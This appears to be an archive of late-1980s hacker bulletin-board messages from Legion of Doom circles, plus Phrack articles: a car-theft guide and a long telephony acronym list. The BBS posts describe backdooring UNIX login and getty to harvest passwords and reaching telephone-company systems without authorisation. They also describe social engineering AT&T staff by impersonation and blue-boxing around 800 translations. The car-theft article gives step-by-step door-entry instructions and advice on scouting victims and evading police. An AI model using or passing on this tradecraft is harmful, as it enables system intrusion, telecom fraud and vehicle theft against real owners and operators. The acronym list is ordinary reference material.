Name: Erik Bloodaxe #2
Date: Thu Jan 11 13:18:39 1990
46/60: pac*it
Name: Corrupt #114
Date: Thu Feb 01 06:59:10 1990
pac*it plus calls 03110..germany and spain..I didn't think it called DPAC.
usefulfor scanning spain..but at this point......hmm I'd be scared of what
MCI i would do then GM...
anyone up on Kinneynet?hehehehehe
I'll post the dialup later but u need a NUI for it :-((
Develnet? I thought the Develnet was just x.25 server software! I've seen
several Develnet pads and I had gotinto thesystems it connected to and they
weren't MEAN related...maybe I'm wrong?(it was a modm company.)
Needless to say I was pissed when everyone used it todeath just to see a
pretty (canada)..the reason it diconnects is because of where you're calling
from..if you call from canda u probably won'T expirence this problem....on the
36/41: Woah!
Name: Erik Bloodaxe #2
Date: Mon Jan 22 03:36:40 1990
I wasn't ragging on MPE! Not at all, i was just "JOking" about the large
numbers of hp-3000 systems around the world and the unbelievable ease in
gaining access on one.
Geez, read...MPE seems ok, just kinda hard to get used to.
I mean, I'm in HUNDREDS of hp's, but until last year I didn't know what to do
with them...so they just sat there.
UNIX is just as lame security-wise, but On a percentage basis, I have gotten
into 85-90% of the HP's I have found, while I've only gotten into abot 50% of
the UNIXes I've found.
(Look at me grovel before one of the two HP experts I've ever seen...pathetic,
isn't it?)
Wiz, no offense intended towards your adopted O.S.
->ME
nice trojans
------------
good security
this works both ways....look-out for unixes(and VMS sites) that keep another
copy of /etc/passwd (or sysuaf.dat) and everynite rewrite it over the one
used for login(some any mods are discovered)..u can alternatly install some
security inside likethis for yourself...(hide it in CROn) (or wherever u want
on vms:-)) undersytand? I know I'm not clear:-((
but thats works for you sometimes and it'S simple if you know script:-)
anyone here into Rapid Fire hacking?
3/46: LMOS
Name: Acid Phreak #8
Date: Tue Jan 09 17:56:23 1990
The most recent LMOS interlude was one in my local area. Got the host
processor (an IBM 3270) off Predictor. Overall, a very handy tool to add to
your telco 'collectables'. The FE's of course were PDP 11/70s using MLT for
reference.
Aw thit.. lookit all dem Hicaps.
--ap
(advanced phreaking)
6/46: ICRIS
Name: Phiber Optik #6
Date: Wed Jan 10 16:37:27 1990
Not to nitpick, but an LMOS CP is an IBM S370 (3270 is an SNA, used to get to
BANCS through LOMS for instance).
CRIS, as mentioned, the Customer Record Information System is a dandy little
IBM system whose main purpose is to house customer records. There are a small
handful of "CRIS" systems, like LCRIS (Local), and ICRIS (Integrated, which
should be noted is used by the Residential Service Center). Here in NYNEX, the
only way to reach these systems (we obviously aren't hardwired hackers) is
through BANCS, a bisync network. BANCS is not direct dialable, but IS
available through a 3270 link on the LOMS system, used by LDMC (LAC or FACS,
depending where you live). And LOMS IS accessible. A host of systems are also
available through FACS (which can be reached through LOMS on BANCS) such as
CIMAP, LMOS, SOP, TIRKS, the COSMOS-PREMISE interface, etc. So as you can see,
rather than going after any specific system, going after the RIGHT system will
pay off greatly (LOMS in this example). Oh, waitta-minnit, those mentioned
systems are off of BANCS, sorry. You can reach FACS on BANCS, and access a
couple 'o things like some of those mentioned, COSMOS (certain wire centers
only), etc. OK, enough rambling. Let's hear someone else's input.
Phiber Optik
Legion Of Doom!
$LOD$
____________________________________________________________________________
*** {The Twilight Zone BBS (203), Sysop: The Marauder} ***
*** {NOTE: All messages from 1985 unless stated otherwise} ***
Under CCIS, INWATS (800's) are handled completely different from the older
method (the old method i don't completely uderstand, but it translated
somehow based on it's own prefix & suffix). under ccis on the other hand,
inwats #'s are handled in the following manner: when the 800 number reaches
your toll office, a query is made to the 'INWATS DATABASE', (the master
database being at the KC RNOCS I believe), i believe each RNOC (regional
network operations center, of wich there are 12, one for each region), has
their own database (which is updated on a regular basis). a query is made
(via a CCIS link) to the inwat's database, and a POTS (plain old telephone
service, just a plain 10 digit ddd telephone number, ie: npa+pre+suffix), and
the POTS number is pulsed out from the toll center and your call is completed
just like a normal ddd (direct distance dialing) call, talthough it was noted
that the call was an 800 at the origination (your) toll office, so and you
are not charged foor the call.. with this in mind, it's a simple matter for
the inwat's database that handles your reigon to return a translation that
differs from another reigons translation, for example say fred phreak in
new jersey places a call to LDX extender service at 800-XXX-3333, upon
reaching his toll center, the toll center quereys the inwat's database that
handles new jersey, and a POTS translation is returned which for obvious
reasons would be the closest port to him, so let's say the translation was
(201)-XXX-4455, the toll office upon recieving this would proceed to complete
the call, and fred phreak would be connected to LDX at (201)-XXX-4455..
continued next..
now, on the other hand let's say bill phreak in california calls the LDX
extender service at (800)-XXX-3333 (same number fred called from NJ), his
regions inwat's database may return a completely different POTS x-lation say
(213)-XXX-1119, again being ldx's closest port to bill phreaks toll center..
utilizing ccis, and inwat's databases, other clever things are possible for
example, as you all know ALLIANCE teleconfrencing is unavailable on
weekends, here's how that works: when you dial 0-700-XXX-1000, that number
is intercepted at TSPS and translated into a corresponding WAT'S number, for
this example, we'll say it translates to (800)-XXX-1003 (white plains), and
forwarded from tsps to a toll center, the toll center upon recieving the
800-XXX-1003, queries it's inwat's database and a POTS translation is
returned say 914-XXX-6677, which is the DN (Directory Number) for the
bridge-center. now on a weekend, the inwat's database, instead of returning
914-XXX-6677 may return 914-XXX-0077, which would terminate at a recording
saying alliance is not reachable on weekends.., that's why everyone is
alway's interested in the 'ALLIANCE TRANSLATIONS'. Because if you have the
x-lation you can simply use a blue box to route yourself directly to the
bridgecenter and bypass the whole tanslation procedure..
The
Marauder
Legion of Doom!
____________________________________________________________________________
*** {Black Ice Private (703) BBS Message Base Sample} ***
*** {Black Ice had a VERY restrictive user base as shown in the} ***
*** {included userlist. The quality of the messages was excellent} ***
You can get them from a 4ess or some work centers like RNOC and RWC (good luck,
have a dialback).. Or from ONAC in Kansas City (816). The Operations Network
Adminstration Center is the focal point for 800 services in the AT&T network.
ONAC works in conjuction with the AT&T WATS centers (I think there are 3?) and
800 service co-ordinators to do operations, adminstration, and maintenance on
the 800 number network. You can reach the WATS centers phree of charge with a
959 plant test number in the correct NPAs (I know 914 has one). I think it was
959-5000 but that might be wrong.
The tech. term for an 800 xlation is a plant test number. This does not have to
be pots, but can be other system codes like 122, 195, 196, 123, etc. The only
type of 800 number that terminates in POTS is a READYLINE 800 number (AT&T). I
don't know about sprint, mci, etc. though. A good topic for investigation
though, thankx for the idea!
If you have access to a 4e (does anyone on her have this? If so I'll trade
anything I have for a 4e), you can type this in to translate a number:
This does a Direct Signaling (DSIG) message into the 4E which commands the 4E
to pull the 800 internal number from the network control point (NCP) over CCIS
links. The 4E you are on must be included in the service area of that 800
number though, i.e. someone in the area served by that 4E would have to be able
to dial it in order for the 4E to have the xlation. So if the 4E is not in the
right area it will say 'NON SUBSCRIBED' or something of that nature. Oh, I just
remembered, there is an AT&T work group named DSAC (Direct Signaling Admin.
Center) that performs direct signaling messages into switches and things. If
you want the DSAC #, I can provide it..I don't think too many phreaks have
their number so they might be worth engineering.
Oh - the 800 xlation input message into the 4E was social engineered a long
time ago by The Marauder and Phucked Agent 04 from an RWC. But, thanks to a
fuck up by The Executioner and friends, the RWCs became very tight lipped...it
only takes 1 fuckup...
Um, I have gotten translations from the customer before, posing as AT&T and
giving them bs about 'MLT has found a potential trouble in your circuit' (haha)
and we need your translation number. I only did this once since I have never
had any major need to pull 800 xlations. But that will work in some cases if a
human answers. Or if you can get the terminating company name/location, you can
keep engineering and narrow down the locations of the xlation (say within their
centrex group or something) and then (ughh..dangerous and slow) scan for the
number, or do more engineering for it, etc...
There is an easier way to get 800 translations but I swore not to tell anyone
(that was the conditions of me getting the info) from a certain AT&T dept and a
certain support system...if you want a translation in an AT&T area I will try
to get it for you though....so leave mail or post and maybe I can help..
ANI-F
____________________________________________________________________________
%> Message: 5 of 99
%> Title: getty, login
%> When: 12/16/88 at 6:19 pm
%> Left by: The Urvile [Level: 8]
for getty, just check and see if the first entry is <something>, where that is
your back door, of sorts. the init program will have to be a bit (?) larger
than the original, considering that you'll have to put in the stuff to make it
set up your environment & exec /bin/sh.
login, on the other hand, can put a backdoor in the gpass() routine, which can
conveniently write the passwds to a file. not too useful to have lots of
passwds in an already backdoored system, you say? bull. there are lots of
southern bell systems i've gotten into by using the same passwds as the hacked
system. also, what if they remove the backdoor? too bad, it'll take you an
hour or so to put the source up & modify it again.
one thing that i've been thinking about: on a system, backdoor getty, login,
(for the reasons cited above), and something like 'date', to check 1) if root
is using the program, and 2) to see if your handy dandy login has been erased,
and put it back if 3) a day or so has elapsed from the last call of the 'date'.
well, i thought it was a good idea. much better than using cron & whatever to
put a username in the passwd file.
encryption on cosmos:
it's strange, to be sure. i tried putting a 404 cosmos passwd on your 602
cosmos. The user id's were different, the versions of cosmos were different, i
think, but the username was the same. has anyone ever seen ANY (no matter how
old) cosmos login source?
incidentally, is anyone doing anything on sbdn of late?
scanning for addresses is generally a bad idea.
%> Message: 19 of 97
%> Title: DMS
%> When: 12/28/88 at 10:20 am
%> Left by: Epsilon [Level: 8]
I found out some things about DMS if anyone's interested. I only spent a
little while looking around, but I managed to figure out that the DMS does
indeed have a sort of tree structure. I haven't figured out the structure of
TABLES yet, but I kind of know how the rest works. Watch..
Ok, from the > you can enter tasks, (I prefer to call them toolboxes because
they're like little tools you can run to perform different things.) For
instance, you have one called LOGUTIL which is some sort of utility that keeps
tabs on various things, and you can view the logs kept. After you have entered
LOGUTIL, you can type LIST LOGUTIL and it'll spool out commands. You can also
type LIST LOGS to see a list of logs that are kept.
The next thing I was fooling with was SERVORD, which is obviously some type of
Service Order processing software. This toolbox is much friendlier, as it does
include the help command, and it provides help on the syntax of each command.
Unfortunately, it does not give each parameter for each command. I'm sure that
would take up quite a lot of space. I think you're going to need a manual to
really do anything cool with SERVORD, but hey..
Sorry if you people knew all of this already. I guess I'll keep posting about
it as I learn more.
Epsilon
____________________________________________________________________________
%> Message: 36 of 48
%> Title: isis and elf
%> When: 3/25/89 at 12:37 am
%> Left by: Lex Luthor [Level: 8]
ELF - Engine Load Facility. This is a program that transfers and loads code
into a TYMNET Engine node.
ISIS has slots, in each slot a program (node code) can run. This node code
is different for different tasks.
I should clarify the above, only one 'application' ie: gateway, tymcom,
whatever, can run on isis, and usually is found on slot 0. But other programs
can be run on other slots. Programs that allow you to log into the slot and do
things. like DDT - Dynamic Debugging Tool.
All this and more will be explained in my upcoming (hopefully) file on Tymnet
called-- Anatomy of a Packet Switching Network: MDC's TYMNET.
inter-link cleared from VALTDNET (C) H9 N4067 to TYMNET (C) H5981 N7347
inter-link cleared from H1 N2010 TESTNET to H1 N2200 BUBBNET
inter-link cleared from TYMNET (F) H5277 N6420 to BUBBNET (F) H15 N2324
inter-link cleared from AKNET to TYMNET
inter-link cleared from TYMNET to AKNET
inter-link cleared from TRWNET to PUBLIC TYMNET
inter-link cleared from PUBLIC TYMNET to TRWNET
--Lex
%> Message: 44 of 48
%> Title: ontyme II
%> When: 4/4/89 at 1:15 am
%> Left by: Lex Luthor [Level: 8]
The system used for setting up the DECLOD acct was TYMVALIDATE which isn't
exactly the same as NETVAL but close.
Be careful with ONTYME II, since it automatically updates ALL files you read.
So if you read some files in that persons' personal directory, they can see
that either someone has their acct/pass or someone is using IMITATE and reading
their stuff. Me and Skinny Puppy are working on a way to defeat this....
Lex
%> Message: 47 of 48
%> Title: INTL TYMNET
%> When: 4/21/89 at 1:17 pm
%> Left by: Skinny Puppy [Level: 8]
International Tymnet - how many of you have seen tymnet claiming that it serves
over 65 countries, but don't really belive it? well, they do, sort of.
There is a tymnet-europe called Mcdonnell Douglas Information Systems (MDIS).
While I don't have any dialups for it, I have X.121 addresses in France and
BeNeLuxKG. once you get there, you can type HELP and glean alot of what is
going on. The interesting thing is that a lot of things that say ACCESS NOT
PERMITTED from regular tymnet are actually european addresses and can be used
on MDIS. for instance, ROMA (Italian for ROME), ESAIRS, and EURONET (which is a
host selector for american public timesharing systems). While there doesn't
seem to be a lot of european hosts, I am sure that if everyone on here pulled
up all their old tymnet-hack sheets where they had things listed as ANP (My
abbreviated for ACCESS NOT PERMITTED) and tried a few we could find something
new. Right now, I will only give out my French MDIS gateway - It is
208092020029. Figure out how to get there yourself. If you DO find anything
interesting, leave me mail, and we can trade. I already have some internal MDIS
systems there, if I can just figure out how to use them.
Coming Soon to a Board not so near to you: NISNET (tymnet-japan) and the
Carribean tymnets. Until then, ASSIMILATE
_____________________________________________________________________________
%> Message: 3 of 45
%> Title: Operator engineering
%> When: 12/6/88 at 12:43 am
%> Left by: Ferrod Sensor [Level: 8]
To answer ANIF's question, I have been doing some TSPS/TOPS engineering lately
for a variety of purposes, one of which is a bit far fetched but has
possibilities. I am trying to find a way to possibly freeze an operator
console (the method I am trying is actually simpler than it sounds). It
involves getting the op to connect to a short circuite test code, either by ACS
(key) or by OGT (outgoing trunk) outpulsing sequence. There area a few flaws in
this though, the main one being the more than likely possibility of the Op
simply releasing the console position (even though the short circuit, when
dialed, cannot be hang up on, the caller must wait for it to time out (about
three minutes or so).If this was the case, then the result could be the
Operator having an inaccessible outgoing line for a short period of time, which
wouldn't affect much with the actuall console..The things I tried recently with
this didn't result in much, but if I take into account TOPS/TSPS RTA (Remote
Trunking Arrangements) setups (where a caller from one area code, with a 0+ or
0- call, may be connected to an operator in a site in a different NPA. Test
codes are different, even in exchanges, so an operator site in a diffeerent NPA
wouldn't be affected the same with a different code.
The overall purpose to this would be to create a certain condition with the
operator network that could be used to gain information when investigated, say
by someone from Mtce. engineering or theTOPS/TSPS SCC or equivalents. There are
other ways to start an engineer of course, but this is just something that's
concrete (meaning you could get people to fish around for info a bit easier
than coming in for a random request.
This is getting a bit long. I'lll post more later about Operator engineering,
something more immediately practical next time. The board looks promising.
Ferrod/LOD
______________________________________________________________________________
Email: [email protected]
Voice Mail: 512-448-5098
Snail Mail: LOD Communications
603 W. 13th
Suite 1A-278
Austin, Texas USA 78701
______________________________________________________________________________
End Sample H/P BBS Messages File
Email: [email protected]
Voice Mail: 512-448-5098
Snail Mail: LOD Communications
603 W. 13th
Suite 1A-278
Austin, Texas USA 78701
==Phrack Magazine==
-----------------------------------------------------------------------------
by
Spy Ace
------
Of course, the angle in this diagram is far too steep. Both angles
should only be about 15 degrees. Hopefully, you get the idea. If
not, you probably shouldn't be thinking about stealing a car. In
any case, if you have succeeded in fashioning this, you are now
armed with the only tool necessary to gain keyless entry into your
soon-to-be new Camaro. The application of this tool is simple.
Walk up to a Chevrolet Camaro of a year described above, position
yourself at either door. FIRST: Check to see if the door is
unlocked. You'd be surprised. If it isn't, you will need to insert
the tool straight down, in between the rubber weather-stripping and
the glass, approximately 4-5 inches from the back of the door,
directly in line with the door-lock. Insert the tool such that the
small section (see above diagram) is thrust down into the door (did
I mention that stealing a car is very sexual? Never mind...). The
small section of the tool should be bent TOWARDS you as you stand
at the car. In the above diagram, north is towards the car, west is
straight up in the air, east is straight down towards the inside of
the door, and south is towards you as you stand at the car. Got the
picture? If not, get a friend to explain it to you.
WHY THIS WORKS: Well, this works for two reasons. First of all,
General Motors is run by a bunch of cheap bastards and their
cars are designed by engineers who couldn't find their asses with
both hands. Basically, it's a shitty lock mechanism. It was
designed shitty and the clods who sell us the piece-of-shit cars
couldn't care less if they get stolen so they've never bothered to
redesign the damn thing.
Once you've gained physical entry into the vehicle, you are
now ready for Step Two, ignition lock bypass. Unfortunately, this
is a difficult step. I did a tremendous amount of research to
determine the best way to deal with this problem and have
developed an approach. It is by no means the only way to breach
the ignition locking mechanism, but in my opinion it is the
best. In developing this method I was most interested in several
goals. First of all, I wanted an elegant solution; that is,
something simple. Minimum tools and work required, and something
that worked ALL THE TIME, not 50%. Second, I wanted an approach
that could be accomplished quickly (for obvious reasons) and with
minimum damage to the vehicle. Ideally, I wanted an attack which
would not even be immediately obvious to someone (such as a cop)
glancing in my car at a stoplight. Spending 30 minutes tearing
apart the steering column might allow you to get the car started,
but it won't meet the above criteria: speed, elegance, reliability,
invisibility.
V.A.T.S.
--------
Scouting a Victim
-----------------
There are numerous other places. Start noting the places that
you leave your car: supermarket, movie theater, in front of your
house, at work, in a parking garage, etc. Start noticing patterns.
That 1988 IROC you see parked in the same place for five hours
every Tuesday. When you actually commit the deed, BE PREPARED. Do
a dry run. Be calm, work quickly but carefully. Act like you
belong where you are -- don't lurk around nervously. Walk right
up to the car and steal it. If confronted by someone, try to talk
your way out of it. Don't get violent: it's just a thing. A car
is not worth hurting someone over. Don't worry about getting
caught: most cities can't cope with the crime epidemic and do not
bother to do much about auto theft.
-->Spy Ace<--
[email protected]#
==Phrack Magazine==
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ +
+ The Telephony Acronyms and Abbreviations List from Hell +
+ +
+ +
+ by +
+ Crisp GRASP +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Well, here it is, the list from hell. Sure beats the old lists of 100
or so three letter acronyms. The whole reason for this list is so that
you can crack almost ANY bell document. This list came from a few
lists (one in Phrack a while back) and a few other Telephony lists
here and there. Though it must be noted (and i want to take credit for
it) that well over half of the acronyms and abbreviations were typed
in by me, inputed into my database (of course I am not about to give
out my database).
It is always a good idea to start a database, one will learn a lot
faster. It is doing things scientific like, and for someone as
compulsive as I, solving the puzzle of the telephone company was easy
as pie. I must say that all the hackers I have meet, and talked to are
all compulsive as hell <G>. I think it is just what it comes down to,
who is willing to learn. Any ways here is two fields in my database,
one small part, but worth it. Though i do not think it will be able
to help most of you out, just gets into too much, and understanding
which acronym goes where, and understanding what goes where is hard.
Well good luck!
Greets to Bell Northern Labs, never see too much from you press wise!
and to SRI, should have come to Cal. hah (Don knows what I am talking
about, his funding is short)
--------------------------------------------------------------------------
D Data
D Default supervision
D Digits
D Dispach
D Hotel/motel equipment from trouble report (TSPS only)
D-CTL D channel controller (IDEC)
D/A Digital to analog
D1PK DS-1 interface pack (SCM-10S NTI)
D1PK DS-1 interface pack (SCM-10S MUX NTI)
DA Digital data off-net extention INTER/TRA blocal 1-26
DA Directory assistance
DAC Digital to analog converter
DAC Dispatch Administration Center
DACC Directort assistance call completion
DACK Direct memory access acknowledge
DACOM Data communictions corp. of korea (ROK)
DACS Digital access cross-connect system
DACS Digital accessed and cross-connected system
DACS Directory assistance charging system
DACTVTD Deactivated
DAEDR Delimitation
DAIS Distributed automatic intercept system
DAML Digital added main line (pair gain)
DAMT Direct access mechanize testing
DAP Display administration process
DAP Document application profile
DARC Division alarm recording center
DART Distribution area rehabilitation
DARU Distributed automatic intercept system audio response unit
DAS Data auxiliary set
DAS Directory assistance system
DAS Distributor and scanner
DAS-WDT Distributor and scanner-watch dog timer
DAS/C Directory assistance system/computer
DASD Direct access storage device
DASS2 Digital access signaling system 2 (BT)
DAU Digital access unit
DAV Data above voice
DAY Delete an assembly
DB DSSDS 1.5 mb/s access line INTER/TRA blocal 1-26
DB Decibel
DBA Data base administrator
DBAC Data base administration center
DBAS Data base administration system
DBCS Data bank control system
DBL Data base load
DBM Database manager
DBMS Data base management system
DBOS Data bank organization system
DBS Duplex bus selector
DBSS Data bank security system
DC Device cinfirmation (C/I channel code)
DC Dial code
DC Direct current
DCC Data collection computer
DCC Data country code (ISO 7498)
DCC Destination code cancellation
DCC Destination code cancellation control
DCC Digroup core controller
DCCS Discontiguous shared segments
DCD Data collection device
DCE Data circuit terminal equipment
DCE Data circuit-terminating equipment
DCE Data communications equipment
DCE Digital carrier equipment
DCG Default cell group
DCH D channel handler
DCH D-channel handling bit
DCH Discharge
DCHOOS D-channel is out of service.
DCL Data clock (i.e. IOM2)
DCL Dec control language
DCLU Digital carrier line uint
DCLU Digital carrier line unit
DCM Digital carrier module
DCME Digital circuit multiplexing equipment
DCMS Distributed call measurement system
DCMU Digital concentrator measurement unit
DCN List disconnected and changed numbers
DCP D channel processor
DCP Duplex central processor
DCPR Detailed contuing property record (pics/dcpr)
DCPSK Differential coherent phase-shift keying
DCS Data communications subsystem
DCS Digital crosconnect system
DCS Digital cross-connect system
DCS Direct current signaling
DCSO Display compleated service order (lmos command)
DCT Digital carrier trunk
DCTB Dct bank
DCTEXT DCT extended
DCTN Defense commercial telecommunications network
DCTS Dimension custom telephone service
DCTUCOM Directly connected test unit common board
DCTUPORT Directly connected test unit port circuit
DCn Device control n
DD Data downstream (i.e. IOM2)
DD Delay dial
DD Disk drives
DD Due date
DD Total switching control center (SCC) and field work time.
DDC Direct department calling
DDCMP Daily display conversation mode and printer
DDD Direct distance dialing
DDGT Digital data group terminal
DDI Direct dialing-in (i.251 A)
DDN Defense data network
DDOV Digital data over voice
DDS DDS loopback test (SARTS command)
DDS Dataphone digital service
DDS Digital data service
DDS Digital data system
DDS Digital data system (the network) dataphone digital
DDS Digital dataphone service
DDS Display the DS table
DDX Digital data exchange
DDX Distributed data exchange
DEAC Deactivation (C/I channel code)
DEACT Deactivate
DEC Digital equipment corporation
DECT Digital european cellular phone
DEL Delete
DEN Digital equipment number
DERP Defective equipment replacement program
DES Data encryption standard
DES Destination
DEST Destinations
DET Detatch MSG. (i.451)
DEV Deviation
DEV Device
DEW Distant early warning (line)
DF Distributing frame
DF Distribution frame
DF HSSDS 1.5 mb/s hub to hub INTER/TRA blocal 1-26
DFC Disk file controller
DFI Digital facility interface
DFI Digital facility interface.
DFI Digital family interface
DFIH Digital facility interface circuit pair
DFMS Digital facility management system
DFTAC Distributing frame test access circuit
DG HSSDS 1.5 mb/s hub to earth station INTER/TRA blocal 1-26
DGCT Diagnostic control table
DGN Diagnose
DGN Memory failure in CS/PS diagnostic program - 1AESS mem diag
DH Digital service INTER/TRA blocal 1-26
DI Deactivation indication (C/I channel code)
DI Direct-in dial INTER/TRA blocal 1-26
DI Unk division?
DIA Document interchange architecture
DIAG Diagnostic
DIC Digital concentrator
DIC Digital interface controller
DID DI downstream
DID Direct inward dialing
DIF Digital frame interface
DIF Digital interface
DIF Digital interface frame
DIFF Difference
DILEP Digital line engineering program
DIM Data in the middle
DIP Dedicated inside plant COSMOS command
DIP Dip creation option
DIP Document interchange protocol (lower sublayer of OSI layer 6)
DIP Dual in-line package
DIR Direction
DIR Directory
DIR Standard dip report
DIS Disconnect
DIS Display
DISA Direct inward system access
DISABL Disable
DISC Disconnect (LAP-D command)
DISD Direct inward subscriber access
DIST Distribute point board
DIU Deactivate indication
DIU Digital interface unit
DIU Digroup interface unit (DACS)
DIV (Ger) Digital exchange
DIVF (Ger) Div for long distance service
DIVO (Ger) Div for local service
DJ Digit trunk INTER/TRA blocal 1-26
DK Data link INTER/TRA blocal 1-26
DL Dial
DL Dictation line INTER/TRA blocal 1-26
DL1PE DLI 1 parity error
DL5MDA Someone who collects each ISDN abbrevation crossing his way
DLAB Divisor latch access bit
DLC Data link control
DLC Data link controller assignment for clusters
DLC Digital loop carrier
DLCI Data link connection identifier (i.440: SAPI+TEI)
DLCU Digital line carrier unit
DLE Data link escape (ascii control)
DLI Data link interface
DLI0I Data link 0 interrupt
DLI1I Data link 1 interrupt
DLISW DLI switch error
DLL Dial long lines
DLM Data link module
DLN Direct link node
DLNORSP Init response not received from data link.
DLOPE Dual link interface (DLI) 0 parity error
DLP Data level point
DLS Digital line section
DLS Digital link service
DLTHA Display trouble history all (LMOS command)
DLTU Digital line trunk unit
DLTU Digital line/trunk unit
DLU-PG Digital line unit-pair gain
DLUC Digital line unit control
DLYR Delayed readiness
DM DMR
DM Delta modulation
DM Disconnected mode (LAP-D response)
DMA Direct memory access
DMB Digital multipoint bridge
DMERT Duplex multiple environment real time
DMI Digital multiplexed interface
DML Data manipulation logic
DMLHG DSN/AUTOVON MLHG
DMQ Deferred maintenance queue
DMS Data management system
DMS Digital multiplex system (i.e. DMS 10, DMS 100)
DMS Digital multiplexed system
DMU Data manipulation unit
DN Directory number
DN Directory numbers
DN Distribution network panel
DN Down
DN Mail distribution frame - COSMOS defult
DNC Dynamic network controller
DNH Directory Number Hunting
DNHR Dynamic non hierarchical routing
DNHR Dynamic nonhierarchical routing
DNI Digital network interconnecting
DNIC Data network identification code
DNIC Data network identification code (ISO 7498)
DNR Detaled number record
DNR Dialed number recorder
DNX Dynamic network X-connect
DO Direct-out dial INTER/TRA blocal 1-26
DOC Dynamic overload control
DOC Dynamic overload controls messages.
DOCS Display operator console system
DOD (USA) Dept. of defense
DOJ Department of justice
DOM Data on master group
DOTS Digital office timing supply
DOV Data over voice
DP Demarcation point
DP Dial pulse
DP Digital data-2 4 kb/s INTER/TRA blocal 1-26
DPA Different premises address
DPA Dispatch
DPA Distributed power architecture
DPAC Dedicated plant assignment card
DPAC Dedicated plant assignment center
DPC Destination point code (SSY)
DPCM Differential PCM
DPE Data path extender
DPGS Digital pair gain systems
DPIDB Direct PIDB
DPIDB Directly connected peripheral interface data bus
DPLL Digital phase locked loop
DPN Dip purge number
DPN-PH Data packet network-packet handler
DPNSS Digital private network signaling system (BT)
DPP Discounted payback period
DPP Distributed processing peripheral
DPR Dip report and removal
DPSK Differential phase shift keying
DPSK Differential phased-shift keying
DPT Data parameter testing
DPT Department name
DPU Digital patch unit
DQ Digital data-4 8 kb/s INTER/TRA blocal 1-26
DQR Design quota system report
DQS Design quota system
DR Data ready
DR Data receive
DR Deactivate request (C/I channel code)
DR Deactivation request
DR Digital data-9.6 kb/s INTER/TRA blocal 1-26
DRAM Digital record announcement machine
DRAM Dynamic ram
DRCS Dynamically redefinable character sets
DRHR Division of revenue hourly
DRMU Digital remote measurement unit
DRTLRT Dial repe tie lindal repeatie t
DRU DACS remote unit
DS Data set
DS Digital carrier span
DS Digital signal
DS Direct signal
DS-0 Digital signal 0 (one channel at 64 kb/s)
DS-0A Digital signal at a subrate level on DS-0 for one customer
DS-0B Digital signals at a subrate level on DS-0 facility for one
or more CU
DS-1 Digital signal level one
DS0 Digital signal zer0
DSBAM Double-sideband amplitude module
DSBLD Disabled (default).
DSC Digital cross-connection systems
DSC Digital subscriber controller AM79C3A
DSCT Digital service copper transport
DSDC Direct service dial capability
DSI Digital speech interpolation
DSIG Direct signaling
DSK Disk
DSL Digital subscriber line
DSL Digital suscriber line
DSLG digital subscriber line group (DSLG)
DSLINIT DSL initialization.
DSM Digital switching module
DSMX (Ger) Digital signal multiplexer
DSN Defense switched network/automatic voice network
DSN Digital signal (level) n
DSNE Double shelf network equipment frame
DSNOFC DSN/AUTOVON office totals
DSNTG DSN/AUTOVON trunk group
DSP Digital signal processing
DSP Digital signal processing or digital signal processor
DSP Digital signal processor
DSP Domain specific part (ISO 7498)
DSR Data set ready
DSR Display results
DSR Dynamic service register
DSRTP Digital service remote test port
DSS Data station selector
DST Destination of order response
DSU Data service unit
DSU Data servicing unit
DSU Digital service unit
DSU2 Diditalservice unit
DSX Digital cross-connect
DSX Digital signal cross-connect
DT DI-group terminal
DT Data through (C/I channel code in test mode)
DT Data transmit
DT Detect dial tone
DT Due time
DT1 Data form class 1
DTAC Digital access connector
DTAC Digital test access connector
DTAC Digital test access connector (links SMAS and SLC-96)
DTAM Document transfer access and manipulation
DTAS Digital test access system
DTAU Digital test access unit
DTC Data test center
DTC Di-group terminal controller
DTC Digital telephone controller (ARCOFI + IBC + ICC)
DTC Digital trunk controller
DTE Data terminal equipment
DTE Print current date
DTF Dial tone first (pay phone)
DTG Direct trunk group
DTIF Digital transmission interface frame
DTM Data test module
DTM Digital trunk module
DTMF Dual-tone multifrequency
DTR Data terminal ready
DTRK Digital Trunks
DTRK Digital trunks (line and trunk)
DTU Di-group terminal unit
DTU Digital test unit
DU Data upstream (i.e. IOM2)
DU Deactivation request upstream (C/I channel code)
DUIH Direct user interface handler
DUP Data user part
DUP Duplicate
DUR Duration
DUV Data under voice
DVA Design verified and assigned
DVX Digital voice exchange
DW Digital data-56 kb/s INTER/TRA blocal 1-26
DX Duplex
DY Digital service (under 1 mb/s) INTER/TRA blocal 1-26
DYRECT Sides dynamic real time communication tester (in sitest)
E E (receive) signal lead (moreover Ear part of E&M)
E Equipment direction
E Remote trunk arrangement position subsystem (rta/pss) from troubl
E&M Receive & transmit/ear & mouth signaling
E-COM Electronic computer originated mail
E1 Equipment system
E800 Enhanced 800 Service
E911 Enhanced 911
EA Equal access end office
EA Expedited data acknowledgement (SS7: in SCCP)
EA Extended adress
EA Switched acess INTER/TRA blocal 1-26
EAAT Equal access alternative technologies
EADAS Engineering and administration data acquisition system
EADAS/NM EADAS/network management
EAEO Equial access end office
EAI Emergency action interface
EAP Equal access plan
EARN European academic research network
EAS Extended announcement system
EAS Extended area service
EASD Equal access service date
EB Enfia ii end office trunk INTER/TRA blocal 1-26
EBAC Equipmentc billing accuracy control
EBCDIC Extended binary coded decimal interexchange code
EBSP EBS prefix translations
EBSP Enhanced business services prefix translations
EC ESS entity and control group number
EC Echo canceller
EC Enfia ii tandem trunk INTER/TRA blocal 1-26
EC Environment code
EC European community
EC Exchange carriers
ECAP Electronic customer access program
ECC Enter cable change
ECCS Economic c (hundred) call seconds
ECD Equipment configuration database
ECDMAN Equipment configuration database manager
ECF Enhanced connectivity facility
ECL Emitter coupled logic
ECMA European computer manufactueres association
ECPT Electronic coin public telephone
ECR Exchange carrier relations
ECS Electronic crosconnect system
ECS Equipment class of service
ED Enter date
EDAC Electromechanical digital adapter circuit
EDD Envelope delay distortion
EDI Electronic data interchange
EDP Electronic data processing
EDSC Electronic directory customer counts (ISDN BRCS)
EDSX Electronic digital signal x-connect
EDZ Facility emergency assignment list
EE Combined access INTER/TRA blocal 1-26
EE Initials of supervisor reviewing this ticket.
EEC Electronic equipment cabinet
EECT End-to-end call trace
EEDP Expanded electronic tandem switching dialing plan
EEE Electronic equipment enclosures
EEHO Either end hop off
EEI Equipment-to-equipment interface
EEPROM Electrically erasable programmable read only memory
EF Entrance facility-voice grade INTER/TRA blocal 1-26
EFCTS Electronic custom telephone service
EFRAP Exchange feeder route analysis program
EG Type #2 telegraph INTER/TRA blocal 1-26
EIA Electronic industries association
EIS Expanded inband signaling
EISS Economic impact study system
EIU Extended interface unit
